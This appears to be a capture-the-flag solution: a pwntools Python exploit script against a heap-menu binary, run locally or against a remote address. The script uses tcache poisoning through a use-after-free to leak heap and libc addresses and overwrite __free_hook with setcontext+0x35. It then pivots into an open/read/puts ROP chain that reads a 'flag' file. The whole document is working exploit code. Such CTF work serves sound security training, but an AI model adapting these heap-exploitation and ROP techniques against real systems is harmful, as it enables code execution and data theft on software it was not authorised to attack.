| from pwn import * import sys
context.arch='amd64'
flag=0 if flag: sh = remote('119.3.81.43', 49153) else: sh = process("./pwn")
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6',checksec=False) sa = lambda s,n : sh.sendafter(s,n) sla = lambda s,n : sh.sendlineafter(s,n) sl = lambda s : sh.sendline(s) sd = lambda s : sh.send(s) rc = lambda n : sh.recv(n) ru = lambda s : sh.recvuntil(s) ti = lambda : sh.interactive() leak = lambda name,addr :log.success(name+":"+hex(addr)) def menu(choice): sla(">>",str(choice)) def add(index,size): menu(1) sla('index:',str(index)) sla('input size:',str(size)) def edit(index,content): menu(3) sla('input index:',str(index)) sa('input context:',content) def dele(index): menu(2) sla('input index:',str(index)) def show(index): menu(4) sla('input index:',str(index))
add(0,0x50) add(1,0x50)
add(4,0x30) add(5,0x30)
dele(0) dele(1) show(1) tcache_head = u64(ru('\x55')[-6:].ljust(8,'\x00')) - 0xf30 leak('tcache_head',tcache_head)
sla(">>",'1'*0x420) target=tcache_head+0x750 leak('target',target)
edit(1,p64(target+0x10)+'\n') add(2,0x50) add(3,0x50) show(3) libc_base = u64(ru('\x7f')[-6:].ljust(8,'\x00')) -0x3ebcb0 leak('libc_base',libc_base) __free_hook = libc_base+libc.sym['__free_hook'] setcontext_35=libc_base+libc.sym['setcontext'] + 0x35
dele(4) dele(5) edit(5,p64(__free_hook)+'\n') add(6,0x30) add(7,0x30)
add(8,0x60) add(9,0x30) add(10,0x30)
pop_rdi=libc_base+0x00000000000215bf pop_rsi=libc_base+0x0000000000023eea pop_rdx=libc_base+0x0000000000001b96 flag_addr=tcache_head+0x780 orw_addr = tcache_head+0x780 orw_rop='flag'.ljust(0x10,'\x00') orw_rop += p64(pop_rdi) + p64(flag_addr) orw_rop += p64(pop_rsi) + p64(0) orw_rop += p64(libc_base+libc.sym['open']) orw_rop += p64(pop_rdi) + p64(3) orw_rop += p64(pop_rsi) + p64(tcache_head+0x440) orw_rop += p64(pop_rdx) + p64(0x50)
orw_rop += p64(libc_base+libc.sym['read']) orw_rop += p64(pop_rdi) + p64(tcache_head+0x440) orw_rop += p64(libc_base+libc.sym['puts']) print len(orw_rop) edit(8,orw_rop[:0x60]) orw_last = tcache_head+0x7e0
dele(9) dele(10) edit(10,p64(orw_last)+'\n') add(9,0x30) add(9,0x30) edit(9,orw_rop[0x60:])
add(0,0x40) add(0,0x40) edit(0,'\x00'*0x40) add(1,0x40) edit(1,'\x00'*0x40) add(1,0x40) edit(1,'\x00'*0x40)
chunk1=tcache_head + 0x1190 edit(0,p64(chunk1)+'\n') retn=libc_base+0x00000000000008aa edit(1,p64(orw_addr+0x10)+p64(retn)+'\n')
edit(7,p64(setcontext_35)+'\n')
leak('setcontext_35',setcontext_35) leak('orw_addr',orw_addr)
dele(0)
ti()